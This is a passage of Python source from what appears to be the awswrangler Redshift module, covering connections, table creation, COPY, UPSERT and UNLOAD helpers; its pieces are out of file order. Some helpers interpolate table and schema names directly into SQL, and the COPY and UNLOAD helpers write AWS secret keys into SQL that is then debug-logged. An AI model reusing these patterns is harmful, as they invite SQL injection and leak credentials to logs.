df=pd.DataFrame({'col': [1, 2, 3]}), ... path="s3://bucket/my_parquet_files/", ... con=con, ... table="my_table", ... schema="public" ... iam_role="arn:aws:iam::XXX:role/XXX" ... ) >>> con.close() """ path = path[:-1] if path.endswith("*") else path path = path if path.endswith("/") else f"{path}/" session: boto3.Session = _utils.ensure_session(session=boto3_session) if s3.list_objects(path=path, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs): raise exceptions.InvalidArgument( f"The received S3 path ({path}) is not empty. " "Please, provide a different path or use wr.s3.delete_objects() to clean up the current one." ) try: s3.to_parquet( df=df, path=path, index=index, dataset=True, mode="append", dtype=dtype, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, max_rows_by_file=max_rows_by_file, ) copy_from_files( path=path, con=con, table=table, schema=schema, iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, mode=mode, overwrite_method=overwrite_method, diststyle=diststyle, distkey=distkey, sortstyle=sortstyle, sortkey=sortkey, primary_keys=primary_keys, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, serialize_to_json=serialize_to_json, use_threads=use_threads, lock=lock, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) finally: if keep_files is False: s3.delete_objects( path=path, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs )
"""Amazon Redshift Module.""" # pylint: disable=too-many-lines import logging import uuid from typing import Any, Dict, Iterator, List, Optional, Tuple, Union import boto3 import botocore import pandas as pd import pyarrow as pa import redshift_connector from awswrangler import _data_types from awswrangler import _databases as _db_utils from awswrangler import _utils, exceptions, s3 from awswrangler._config import apply_configs _logger: logging.Logger = logging.getLogger(__name__) _RS_DISTSTYLES: List[str] = ["AUTO", "EVEN", "ALL", "KEY"] _RS_SORTSTYLES: List[str] = ["COMPOUND", "INTERLEAVED"] def _validate_connection(con: redshift_connector.Connection) -> None: if not isinstance(con, redshift_connector.Connection): raise exceptions.InvalidConnection( "Invalid 'conn' argument, please pass a " "redshift_connector.Connection object. Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog." ) def _begin_transaction(cursor: redshift_connector.Cursor) -> None: sql = "BEGIN TRANSACTION" _logger.debug("Begin transaction query:\n%s", sql) cursor.execute(sql) def _drop_table(cursor: redshift_connector.Cursor, schema: Optional[str], table: str, cascade: bool = False) -> None: schema_str = f'"{schema}".' if schema else "" cascade_str = " CASCADE" if cascade else "" sql = f'DROP TABLE IF EXISTS {schema_str}"{table}"' f"{cascade_str}" _logger.debug("Drop table query:\n%s", sql) cursor.execute(sql) def _truncate_table(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> None: schema_str = f'"{schema}".' if schema else "" sql = f'TRUNCATE TABLE {schema_str}"{table}"' _logger.debug("Truncate table query:\n%s", sql) cursor.execute(sql) def _delete_all(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> None: schema_str = f'"{schema}".' if schema else "" sql = f'DELETE FROM {schema_str}"{table}"' _logger.debug("Delete query:\n%s", sql) cursor.execute(sql) def _get_primary_keys(cursor: redshift_connector.Cursor, schema: str, table: str) -> List[str]: cursor.execute(f"SELECT indexdef FROM pg_indexes WHERE schemaname = '{schema}' AND tablename = '{table}'") result: str = cursor.fetchall()[0][0] rfields: List[str] = result.split("(")[1].strip(")").split(",") fields: List[str] = [field.strip().strip('"') for field in rfields] return fields def _does_table_exist(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> bool: schema_str = f"TABLE_SCHEMA = '{schema}' AND" if schema else "" cursor.execute( f"SELECT true WHERE EXISTS (" f"SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE " f"{schema_str} TABLE_NAME = '{table}'" f");" ) return len(cursor.fetchall()) > 0 def _make_s3_auth_string( aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, iam_role: Optional[str] = None, boto3_session: Optional[boto3.Session] = None, ) -> str: if aws_access_key_id is not None and aws_secret_access_key is not None: auth_str: str = f"ACCESS_KEY_ID '{aws_access_key_id}'\nSECRET_ACCESS_KEY '{aws_secret_access_key}'\n" if aws_session_token is not None: auth_str += f"SESSION_TOKEN '{aws_session_token}'\n" elif iam_role is not None: auth_str = f"IAM_ROLE '{iam_role}'\n" else: _logger.debug("Attempting to get S3 authorization credentials from boto3 session.") credentials: botocore.credentials.ReadOnlyCredentials credentials = _utils.get_credentials_from_session(boto3_session=boto3_session) if credentials.access_key is None or credentials.secret_key is None: raise exceptions.InvalidArgument( "One of IAM Role or AWS ACCESS_KEY_ID and SECRET_ACCESS_KEY must be " "given. Unable to find ACCESS_KEY_ID and SECRET_ACCESS_KEY in boto3 " "session." ) auth_str = f"ACCESS_KEY_ID '{credentials.access_key}'\nSECRET_ACCESS_KEY '{credentials.secret_key}'\n" if credentials.token is not None: auth_str += f"SESSION_TOKEN '{credentials.token}'\n" return auth_str def _copy( cursor: redshift_connector.Cursor, path: str, table: str, serialize_to_json: bool, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, boto3_session: Optional[str] = None, schema: Optional[str] = None, ) -> None: if schema is None: table_name: str = f'"{table}"' else: table_name = f'"{schema}"."{table}"' auth_str: str = _make_s3_auth_string( iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, boto3_session=boto3_session, ) ser_json_str: str = " SERIALIZETOJSON" if serialize_to_json else "" sql: str = f"COPY {table_name}\nFROM '{path}' {auth_str}\nFORMAT AS PARQUET{ser_json_str}" _logger.debug("copy query:\n%s", sql) cursor.execute(sql) def _lock( cursor: redshift_connector.Cursor, table_names: List[str], schema: Optional[str] = None, ) -> None: fmt = '"{schema}"."{table}"' if schema else '"{table}"' tables = ", ".join([fmt.format(schema=schema, table=table) for table in table_names]) sql: str = f"LOCK {tables};\n" _logger.debug("lock query:\n%s", sql) cursor.execute(sql) def _upsert( cursor: redshift_connector.Cursor, table: str, temp_table: str, schema: str, primary_keys: Optional[List[str]] = None, ) -> None: if not primary_keys: primary_keys = _get_primary_keys(cursor=cursor, schema=schema, table=table) _logger.debug("primary_keys: %s", primary_keys) if not primary_keys: raise exceptions.InvalidRedshiftPrimaryKeys() equals_clause: str = f"{table}.%s = {temp_table}.%s" join_clause: str = " AND ".join([equals_clause % (pk, pk) for pk in primary_keys]) sql: str = f'DELETE FROM "{schema}"."{table}" USING {temp_table} WHERE {join_clause}' _logger.debug(sql) cursor.execute(sql) sql = f"INSERT INTO {schema}.{table} SELECT * FROM {temp_table}" _logger.debug(sql) cursor.execute(sql) _drop_table(cursor=cursor, schema=schema, table=temp_table) def _validate_parameters( redshift_types: Dict[str, str], diststyle: str, distkey: Optional[str], sortstyle: str, sortkey: Optional[List[str]], ) -> None: if diststyle not in _RS_DISTSTYLES: raise exceptions.InvalidRedshiftDiststyle(f"diststyle must be in {_RS_DISTSTYLES}") cols = list(redshift_types.keys()) _logger.debug("Redshift columns: %s", cols) if (diststyle == "KEY") and (not distkey): raise exceptions.InvalidRedshiftDistkey("You must pass a distkey if you intend to use KEY diststyle") if distkey and distkey not in cols: raise exceptions.InvalidRedshiftDistkey(f"distkey ({distkey}) must be in the columns list: {cols})") if sortstyle and sortstyle not in _RS_SORTSTYLES: raise exceptions.InvalidRedshiftSortstyle(f"sortstyle must be in {_RS_SORTSTYLES}") if sortkey: if not isinstance(sortkey, list): raise exceptions.InvalidRedshiftSortkey( f"sortkey must be a List of items in the columns list: {cols}. " f"Currently value: {sortkey}" ) for key in sortkey: if key not in cols: raise exceptions.InvalidRedshiftSortkey( f"sortkey must be a List of items in the columns list: {cols}. " f"Currently value: {key}" ) def _redshift_types_from_path( path: Optional[Union[str, List[str]]], varchar_lengths_default: int, varchar_lengths: Optional[Dict[str, int]], parquet_infer_sampling: float, path_suffix: Optional[str], path_ignore_suffix: Optional[str], use_threads: Union[bool, int], boto3_session: Optional[boto3.Session], s3_additional_kwargs: Optional[Dict[str, str]], ) -> Dict[str, str]: """Extract Redshift data types from a Pandas DataFrame.""" _varchar_lengths: Dict[str, int] = {} if varchar_lengths is None else varchar_lengths session: boto3.Session = _utils.ensure_session(session=boto3_session) _logger.debug("Scanning parquet schemas on s3...") athena_types, _ = s3.read_parquet_metadata( path=path, sampling=parquet_infer_sampling, path_suffix=path_suffix, path_ignore_suffix=path_ignore_suffix, dataset=False, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) _logger.debug("athena_types: %s", athena_types) redshift_types: Dict[str, str] = {} for col_name, col_type in athena_types.items(): length: int = _varchar_lengths[col_name] if col_name in _varchar_lengths else varchar_lengths_default redshift_types[col_name] = _data_types.athena2redshift(dtype=col_type, varchar_length=length) return redshift_types def _create_table( # pylint: disable=too-many-locals,too-many-arguments df: Optional[pd.DataFrame], path: Optional[Union[str, List[str]]], con: redshift_connector.Connection, cursor: redshift_connector.Cursor, table: str, schema: str, mode: str, overwrite_method: str, index: bool, dtype: Optional[Dict[str, str]], diststyle: str, sortstyle: str, distkey: Optional[str], sortkey: Optional[List[str]], primary_keys: Optional[List[str]], varchar_lengths_default: int, varchar_lengths: Optional[Dict[str, int]], parquet_infer_sampling: float = 1.0, path_suffix: Optional[str] = None, path_ignore_suffix: Optional[str] = None, use_threads: Union[bool, int] = True, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, ) -> Tuple[str, Optional[str]]: if mode == "overwrite": if overwrite_method == "truncate": try: # Truncate commits current transaction, if successful. # Fast, but not atomic. _truncate_table(cursor=cursor, schema=schema, table=table) except redshift_connector.error.ProgrammingError as e: # Caught "relation does not exist". if e.args[0]["C"] != "42P01": # pylint: disable=invalid-sequence-index raise e _logger.debug(str(e)) con.rollback() _begin_transaction(cursor=cursor) elif overwrite_method == "delete": if _does_table_exist(cursor=cursor, schema=schema, table=table): # Atomic, but slow. _delete_all(cursor=cursor, schema=schema, table=table) else: # Fast, atomic, but either fails if there are any dependent views or, in cascade mode, deletes them. _drop_table(cursor=cursor, schema=schema, table=table, cascade=bool(overwrite_method == "cascade")) elif _does_table_exist(cursor=cursor, schema=schema, table=table) is True: if mode == "upsert": guid: str = uuid.uuid4().hex temp_table: str = f"temp_redshift_{guid}" sql: str = f'CREATE TEMPORARY TABLE {temp_table} (LIKE "{schema}"."{table}")' _logger.debug(sql) cursor.execute(sql) return temp_table, None return table, schema diststyle = diststyle.upper() if diststyle else "AUTO" sortstyle = sortstyle.upper() if sortstyle else "COMPOUND" if df is not None: redshift_types: Dict[str, str] = _data_types.database_types_from_pandas( df=df, index=index, dtype=dtype, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, converter_func=_data_types.pyarrow2redshift, ) elif path is not None: redshift_types = _redshift_types_from_path( path=path, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, parquet_infer_sampling=parquet_infer_sampling, path_suffix=path_suffix, path_ignore_suffix=path_ignore_suffix, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs, ) else: raise ValueError("df and path are None.You MUST pass at least one.") _validate_parameters( redshift_types=redshift_types, diststyle=diststyle, distkey=distkey, sortstyle=sortstyle, sortkey=sortkey, ) cols_str: str = "".join([f"{k} {v},\n" for k, v in redshift_types.items()])[:-2] primary_keys_str: str = f",\nPRIMARY KEY ({', '.join(primary_keys)})" if primary_keys else "" distkey_str: str = f"\nDISTKEY({distkey})" if distkey and diststyle == "KEY" else "" sortkey_str: str = f"\n{sortstyle} SORTKEY({','.join(sortkey)})" if sortkey else "" sql = ( f'CREATE TABLE IF NOT EXISTS "{schema}"."{table}" (\n' f"{cols_str}" f"{primary_keys_str}" f")\nDISTSTYLE {diststyle}" f"{distkey_str}" f"{sortkey_str}" ) _logger.debug("Create table query:\n%s", sql) cursor.execute(sql) return table, schema def _read_parquet_iterator( path: str, keep_files: bool, use_threads: Union[bool, int], categories: Optional[List[str]], chunked: Union[bool, int], boto3_session: Optional[boto3.Session], s3_additional_kwargs: Optional[Dict[str, str]], ) -> Iterator[pd.DataFrame]: dfs: Iterator[pd.DataFrame] = s3.read_parquet( path=path, categories=categories, chunked=chunked, dataset=False, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs, ) yield from dfs if keep_files is False: s3.delete_objects( path=path, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs ) def connect( connection: Optional[str] = None, secret_id: Optional[str] = None, catalog_id: Optional[str] = None, dbname: Optional[str] = None, boto3_session: Optional[boto3.Session] = None, ssl: bool = True, timeout: Optional[int] = None, max_prepared_statements: int = 1000, tcp_keepalive: bool = True, ) -> redshift_connector.Connection: """Return a redshift_connector connection from a Glue Catalog or Secret Manager. Note ---- You MUST pass a `connection` OR `secret_id`. Here is an example of the secret structure in Secrets Manager: { "host":"my-host.us-east-1.redshift.amazonaws.com", "username":"test", "password":"test", "engine":"redshift", "port":"5439", "dbname": "mydb" } https://github.com/aws/amazon-redshift-python-driver Parameters ---------- connection : Optional[str] Glue Catalog Connection name. secret_id: Optional[str]: Specifies the secret containing the connection details that you want to retrieve. You can specify either the Amazon Resource Name (ARN) or the friendly name of the secret. catalog_id : str, optional The ID of the Data Catalog. If none is provided, the AWS account ID is used by default. dbname: Optional[str] Optional database name to overwrite the stored one. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. ssl: bool This governs SSL encryption for TCP/IP sockets. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver timeout: Optional[int] This is the time in seconds before the connection to the server will time out. The default is None which means no timeout. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver max_prepared_statements: int This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver tcp_keepalive: bool If True then use TCP keepalive. The default is True. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver Returns ------- redshift_connector.Connection redshift_connector connection. Examples -------- Fetching Redshift connection from Glue Catalog >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> with con.cursor() as cursor: >>> cursor.execute("SELECT 1") >>> print(cursor.fetchall()) >>> con.close() Fetching Redshift connection from Secrets Manager >>> import awswrangler as wr >>> con = wr.redshift.connect(secret_id="MY_SECRET") >>> with con.cursor() as cursor: >>> cursor.execute("SELECT 1") >>> print(cursor.fetchall()) >>> con.close() """ attrs: _db_utils.ConnectionAttributes = _db_utils.get_connection_attributes( connection=connection, secret_id=secret_id, catalog_id=catalog_id, dbname=dbname, boto3_session=boto3_session ) if attrs.kind != "redshift": raise exceptions.InvalidDatabaseType( f"Invalid connection type ({attrs.kind}. It must be a redshift connection.)" ) return redshift_connector.connect( user=attrs.user, database=attrs.database, password=attrs.password, port=int(attrs.port), host=attrs.host, ssl=ssl, timeout=timeout, max_prepared_statements=max_prepared_statements, tcp_keepalive=tcp_keepalive, ) def connect_temp( cluster_identifier: str, user: str, database: Optional[str] = None, duration: int = 900, auto_create: bool = True, db_groups: Optional[List[str]] = None, boto3_session: Optional[boto3.Session] = None, ssl: bool = True, timeout: Optional[int] = None, max_prepared_statements: int = 1000, tcp_keepalive: bool = True, ) -> redshift_connector.Connection: """Return a redshift_connector temporary connection (No password required). https://github.com/aws/amazon-redshift-python-driver Parameters ---------- cluster_identifier : str The unique identifier of a cluster. This parameter is case sensitive. user : str, optional The name of a database user. database : str, optional Database name. If None, the default Database is used. duration : int, optional The number of seconds until the returned temporary password expires. Constraint: minimum 900, maximum 3600. Default: 900 auto_create : bool Create a database user with the name specified for the user named in user if one does not exist. db_groups : List[str], optional A list of the names of existing database groups that the user named in user will join for the current session, in addition to any group memberships for an existing user. If not specified, a new user is added only to PUBLIC. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. ssl: bool This governs SSL encryption for TCP/IP sockets. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver timeout: Optional[int] This is the time in seconds before the connection to the server will time out. The default is None which means no timeout. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver max_prepared_statements: int This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver tcp_keepalive: bool If True then use TCP keepalive. The default is True. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver Returns ------- redshift_connector.Connection redshift_connector connection. Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect_temp(cluster_identifier="my-cluster", user="test") >>> with con.cursor() as cursor: >>> cursor.execute("SELECT 1") >>> print(cursor.fetchall()) >>> con.close() """ client_redshift: boto3.client = _utils.client(service_name="redshift", session=boto3_session) args: Dict[str, Any] = { "DbUser": user, "ClusterIdentifier": cluster_identifier, "DurationSeconds": duration, "AutoCreate": auto_create, } if db_groups is not None: args["DbGroups"] = db_groups else: db_groups = [] res: Dict[str, Any] = client_redshift.get_cluster_credentials(**args) cluster: Dict[str, Any] = client_redshift.describe_clusters(ClusterIdentifier=cluster_identifier)["Clusters"][0] return redshift_connector.connect( user=res["DbUser"], database=database if database else cluster["DBName"], password=res["DbPassword"], port=cluster["Endpoint"]["Port"], host=cluster["Endpoint"]["Address"], ssl=ssl, timeout=timeout, max_prepared_statements=max_prepared_statements, tcp_keepalive=tcp_keepalive, db_groups=db_groups, ) def read_sql_query( sql: str, con: redshift_connector.Connection, index_col: Optional[Union[str, List[str]]] = None, params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = None, chunksize: Optional[int] = None, dtype: Optional[Dict[str, pa.DataType]] = None, safe: bool = True, ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Return a DataFrame corresponding to the result set of the query string. Note ---- For large extractions (1K+ rows) consider the function **wr.redshift.unload()**. Parameters ---------- sql : str SQL query. con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. index_col : Union[str, List[str]], optional Column(s) to set as index(MultiIndex). params : Union[List, Tuple, Dict], optional List of parameters to pass to execute method. The syntax used to pass parameters is database driver dependent. Check your database driver documentation for which of the five syntax styles, described in PEP 249’s paramstyle, is supported. chunksize : int, optional If specified, return an iterator where chunksize is the number of rows to include in each chunk. dtype : Dict[str, pyarrow.DataType], optional Specifying the datatype for columns. The keys should be the column names and the values should be the PyArrow types. safe : bool Check for overflows or other unsafe data type conversions. Returns ------- Union[pandas.DataFrame, Iterator[pandas.DataFrame]] Result as Pandas DataFrame(s). Examples -------- Reading from Redshift using a Glue Catalog Connections >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> df = wr.redshift.read_sql_query( ... sql="SELECT * FROM public.my_table", ... con=con ... ) >>> con.close() """ _validate_connection(con=con) return _db_utils.read_sql_query( sql=sql, con=con, index_col=index_col, params=params, chunksize=chunksize, dtype=dtype, safe=safe ) def read_sql_table( table: str, con: redshift_connector.Connection, schema: Optional[str] = None, index_col: Optional[Union[str, List[str]]] = None, params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = None, chunksize: Optional[int] = None, dtype: Optional[Dict[str, pa.DataType]] = None, safe: bool = True, ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Return a DataFrame corresponding the table. Note ---- For large extractions (1K+ rows) consider the function **wr.redshift.unload()**. Parameters ---------- table : str Table name. con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. schema : str, optional Name of SQL schema in database to query (if database flavor supports this). Uses default schema if None (default). index_col : Union[str, List[str]], optional Column(s) to set as index(MultiIndex). params : Union[List, Tuple, Dict], optional List of parameters to pass to execute method. The syntax used to pass parameters is database driver dependent. Check your database driver documentation for which of the five syntax styles, described in PEP 249’s paramstyle, is supported. chunksize : int, optional If specified, return an iterator where chunksize is the number of rows to include in each chunk. dtype : Dict[str, pyarrow.DataType], optional Specifying the datatype for columns. The keys should be the column names and the values should be the PyArrow types. safe : bool Check for overflows or other unsafe data type conversions. Returns ------- Union[pandas.DataFrame, Iterator[pandas.DataFrame]] Result as Pandas DataFrame(s). Examples -------- Reading from Redshift using a Glue Catalog Connections >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> df = wr.redshift.read_sql_table( ... table="my_table", ... schema="public", ... con=con ... ) >>> con.close() """ sql: str = f'SELECT * FROM "{table}"' if schema is None else f'SELECT * FROM "{schema}"."{table}"' return read_sql_query( sql=sql, con=con, index_col=index_col, params=params, chunksize=chunksize, dtype=dtype, safe=safe ) @apply_configs def to_sql( # pylint: disable=too-many-locals df: pd.DataFrame, con: redshift_connector.Connection, table: str, schema: str, mode: str = "append", overwrite_method: str = "drop", index: bool = False, dtype: Optional[Dict[str, str]] = None, diststyle: str = "AUTO", distkey: Optional[str] = None, sortstyle: str = "COMPOUND", sortkey: Optional[List[str]] = None, primary_keys: Optional[List[str]] = None, varchar_lengths_default: int = 256, varchar_lengths: Optional[Dict[str, int]] = None, use_column_names: bool = False, lock: bool = False, chunksize: int = 200, commit_transaction: bool = True, ) -> None: """Write records stored in a DataFrame into Redshift. Note ---- For large DataFrames (1K+ rows) consider the function **wr.redshift.copy()**. Parameters ---------- df : pandas.DataFrame Pandas DataFrame https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. table : str Table name schema : str Schema name mode : str Append, overwrite or upsert. overwrite_method : str Drop, cascade, truncate, or delete. Only applicable in overwrite mode. "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it. "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it. "truncate" - ``TRUNCATE ...`` - truncates the table, but immediatly commits current transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic. "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods. index : bool True to store the DataFrame index as a column in the table, otherwise False to ignore it. dtype: Dict[str, str], optional Dictionary of columns names and Redshift types to be casted. Useful when you have columns with undetermined or mixed data types. (e.g. {'col name': 'VARCHAR(10)', 'col2 name': 'FLOAT'}) diststyle : str Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"]. https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html distkey : str, optional Specifies a column name or positional number for the distribution key. sortstyle : str Sorting can be "COMPOUND" or "INTERLEAVED". https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html sortkey : List[str], optional List of columns to be sorted. primary_keys : List[str], optional Primary keys. varchar_lengths_default : int The size that will be set for all VARCHAR columns not specified with varchar_lengths. varchar_lengths : Dict[str, int], optional Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}). use_column_names: bool If set to True, will use the column names of the DataFrame for generating the INSERT SQL Query. E.g. If the DataFrame has two columns `col1` and `col3` and `use_column_names` is True, data will only be inserted into the database columns `col1` and `col3`. lock : bool True to execute LOCK command inside the transaction to force serializable isolation. chunksize: int Number of rows which are inserted with each SQL query. Defaults to inserting 200 rows per query. commit_transaction: bool Whether to commit the transaction. True by default. Returns ------- None None. Examples -------- Writing to Redshift using a Glue Catalog Connections >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.to_sql( ... df=df, ... table="my_table", ... schema="public", ... con=con ... ) >>> con.close() """ if df.empty is True: raise exceptions.EmptyDataFrame() _validate_connection(con=con) autocommit_temp: bool = con.autocommit con.autocommit = False try: with con.cursor() as cursor: created_table, created_schema = _create_table( df=df, path=None, con=con, cursor=cursor, table=table, schema=schema, mode=mode, overwrite_method=overwrite_method, index=index, dtype=dtype, diststyle=diststyle, sortstyle=sortstyle, distkey=distkey, sortkey=sortkey, primary_keys=primary_keys, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, ) if index: df.reset_index(level=df.index.names, inplace=True) column_placeholders: str = ", ".join(["%s"] * len(df.columns)) schema_str = f'"{created_schema}".' if created_schema else "" insertion_columns = "" if use_column_names: insertion_columns = f"({', '.join(df.columns)})" placeholder_parameter_pair_generator = _db_utils.generate_placeholder_parameter_pairs( df=df, column_placeholders=column_placeholders, chunksize=chunksize ) for placeholders, parameters in placeholder_parameter_pair_generator: sql: str = f'INSERT INTO {schema_str}"{created_table}" {insertion_columns} VALUES {placeholders}' _logger.debug("sql: %s", sql) cursor.executemany(sql, (parameters,)) if table != created_table: # upsert if lock: _lock(cursor, [table], schema=schema) _upsert(cursor=cursor, schema=schema, table=table, temp_table=created_table, primary_keys=primary_keys) if commit_transaction: con.commit() except Exception as ex: con.rollback() _logger.error(ex) raise finally: con.autocommit = autocommit_temp def unload_to_files( sql: str, path: str, con: redshift_connector.Connection, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, region: Optional[str] = None, unload_format: Optional[str] = None, max_file_size: Optional[float] = None, kms_key_id: Optional[str] = None, manifest: bool = False, partition_cols: Optional[List[str]] = None, boto3_session: Optional[boto3.Session] = None, ) -> None: """Unload Parquet files on s3 from a Redshift query result (Through the UNLOAD command). https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD.html Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- sql: str SQL query. path : Union[str, List[str]] S3 path to write stage files (e.g. s3://bucket_name/any_name/) con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. region : str, optional Specifies the AWS Region where the target Amazon S3 bucket is located. REGION is required for UNLOAD to an Amazon S3 bucket that isn't in the same AWS Region as the Amazon Redshift cluster. By default, UNLOAD assumes that the target Amazon S3 bucket is located in the same AWS Region as the Amazon Redshift cluster. unload_format: str, optional Format of the unloaded S3 objects from the query. Valid values: "CSV", "PARQUET". Case sensitive. Defaults to PARQUET. max_file_size : float, optional Specifies the maximum size (MB) of files that UNLOAD creates in Amazon S3. Specify a decimal value between 5.0 MB and 6200.0 MB. If None, the default maximum file size is 6200.0 MB. kms_key_id : str, optional Specifies the key ID for an AWS Key Management Service (AWS KMS) key to be used to encrypt data files on Amazon S3. manifest : bool Unload a manifest file on S3. partition_cols: List[str], optional Specifies the partition keys for the unload operation. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. Returns ------- None Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.unload_to_files( ... sql="SELECT * FROM public.mytable", ... path="s3://bucket/extracted_parquet_files/", ... con=con, ... iam_role="arn:aws:iam::XXX:role/XXX" ... ) >>> con.close() """ if unload_format not in [None, "CSV", "PARQUET"]: raise exceptions.InvalidArgumentValue("<unload_format> argument must be 'CSV' or 'PARQUET'") session: boto3.Session = _utils.ensure_session(session=boto3_session) with con.cursor() as cursor: format_str: str = unload_format or "PARQUET" partition_str: str = f"\nPARTITION BY ({','.join(partition_cols)})" if partition_cols else "" manifest_str: str = "\nmanifest" if manifest is True else "" region_str: str = f"\nREGION AS '{region}'" if region is not None else "" max_file_size_str: str = f"\nMAXFILESIZE AS {max_file_size} MB" if max_file_size is not None else "" kms_key_id_str: str = f"\nKMS_KEY_ID '{kms_key_id}'" if kms_key_id is not None else "" auth_str: str = _make_s3_auth_string( iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, boto3_session=session, ) sql = ( f"UNLOAD ('{sql}')\n" f"TO '{path}'\n" f"{auth_str}" "ALLOWOVERWRITE\n" "PARALLEL ON\n" f"FORMAT {format_str}\n" "ENCRYPTED" f"{kms_key_id_str}" f"{partition_str}" f"{region_str}" f"{max_file_size_str}" f"{manifest_str};" ) _logger.debug("sql: \n%s", sql) cursor.execute(sql) def unload( sql: str, path: str, con: redshift_connector.Connection, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, region: Optional[str] = None, max_file_size: Optional[float] = None, kms_key_id: Optional[str] = None, categories: Optional[List[str]] = None, chunked: Union[bool, int] = False, keep_files: bool = False, use_threads: Union[bool, int] = True, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Load Pandas DataFrame from a Amazon Redshift query result using Parquet files on s3 as stage. This is a **HIGH** latency and **HIGH** throughput alternative to `wr.redshift.read_sql_query()`/`wr.redshift.read_sql_table()` to extract large Amazon Redshift data into a Pandas DataFrames through the **UNLOAD command**. This strategy has more overhead and requires more IAM privileges than the regular `wr.redshift.read_sql_query()`/`wr.redshift.read_sql_table()` function, so it is only recommended to fetch 1k+ rows at once. https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD.html Note ---- ``Batching`` (`chunked` argument) (Memory Friendly): Will enable the function to return an Iterable of DataFrames instead of a regular DataFrame. There are two batching strategies on Wrangler: - If **chunked=True**, a new DataFrame will be returned for each file in your path/dataset. - If **chunked=INTEGER**, Wrangler will iterate on the data by number of rows (equal to the received INTEGER). `P.S.` `chunked=True` is faster and uses less memory while `chunked=INTEGER` is more precise in the number of rows for each Dataframe. 